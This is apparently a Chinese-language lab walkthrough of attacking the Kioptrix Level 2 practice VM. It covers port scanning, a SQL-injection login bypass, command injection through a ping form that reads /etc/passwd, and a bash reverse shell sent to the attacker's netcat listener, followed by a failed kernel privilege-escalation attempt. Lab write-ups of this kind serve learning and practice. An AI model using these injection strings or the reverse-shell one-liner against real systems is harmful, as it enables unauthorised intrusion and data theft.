Kioptrix Level 2(命令执行漏洞)

kioptrix level 2(命令执行漏洞)

kioptrix level 2(命令执行漏洞)

kioptrix :192.168.1.117         kali linux :192.168.1.111             上一篇 ----- 参考

开放端口:22(ssh),80(http),111(rpcbind),443(https),616(sco-sysmgr),631(ipp),3306(mysql)

后续探测:use scanner/ssh/ssh_version (metasploit 扫描)

[*] 192.168.1.117:22 SSH server version: SSH-1.99-OpenSSH_3.9p1 ( service.version=3.9p1 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH )

版本OpenSSH 3.9p1,暴力破解登陆失败

探测二:use auxiliary/scanner/mysql/mysql_login

192.168.1.117:3306 MYSQL - Unsupported target version of MySQL detected. Skipping.

不支持目标mysql的版本

探测三:use  auxiliary/scanner/mysql/mysql_version

192.168.1.117:3306 is running MySQL, but responds with an error: \x04Host '192.168.1.111' is not allowed to connect to this MySQL server

192.168.1.111是kali的ip,不被允许连接mysql服务器

探测四:浏览器打开 http://192.168.1.117

显示     http://192.168.1.117/index.php


随便输入了一些字符,错误的话直接跳转回上面页面。输入单引号没反应。

输入 admin'or'1'='1,密码随意。如果你不会click here 


基本管理员web控制台,这社么玩意儿?

输入192.168.1.1,点submit


输入正确网段内ip,就执行ping操作;输入错误网段ip,依然执行,不过显示目标主机不可达

输入任意字符,不响应,直接在网页返回你输入的字符。

……

……

……

我真是傻了,能用sql语句进入,说明后台有数据库有sql注入嘛,直接用sqlmap啊

en…… 但是好像没有注入点id=x,sql不精通啊,算了

探测五:https://192.168.1.117

显示“192.168.1.117 的网站管理员未正确配置网站。为避免您的信息被窃,Firefox 没有与该网站建立连接。”

仍然继续,click

e……还是那个操蛋的页面,进去看了看,和80端口提供的一样。


回连shell

如何你能够幸运地找到命令行执行漏洞,很快你可能会想要一个交互式的shell。

如果不可能添加一个新的用户/ssh key/.rhosts文件,并登入,你下一步可能是扔回一个反弹shell或者绑定一个shell到TCP端口。

你能够创建反弹shell取决于目标系统上安装的脚本语言——虽然你也可以上传一个二进制程序,如果你有了很好的准备的话。

下面的例子为unix-like系统定制。一些例子同样能够在windows下运行,如果你使用cmd.exe和‘/bin/sh -i’

……


看完这篇文章,发现自己对于shell and shell script的掌握还显不够。

192.168.1.1;cat etc/passwd/   

输入这个命令,分号使得后面显示密码文件的命令顺便也执行了

nc -l -p 888     kali上执行netcat,监听本地888端口

192.168.1.1;bash -i >& /dev/tcp/192.168.1.111/888 0>&1      反弹shell到kali888端口


成功啦

uname -a

Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

搜索到一个特权用户提权漏洞 ,版本是:Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86)

参考nginx的静态web服务器设置



于是内网就可以通过浏览器访问攻击机4300端口,下载hole.c文件。


cannot write to hole.c ?明明都200 ok了,为什么!为什么!

为什么是can't write ,wget不是下载命令吗,怎么会拒绝写入,是什么鬼


好了,提权失败了。

后续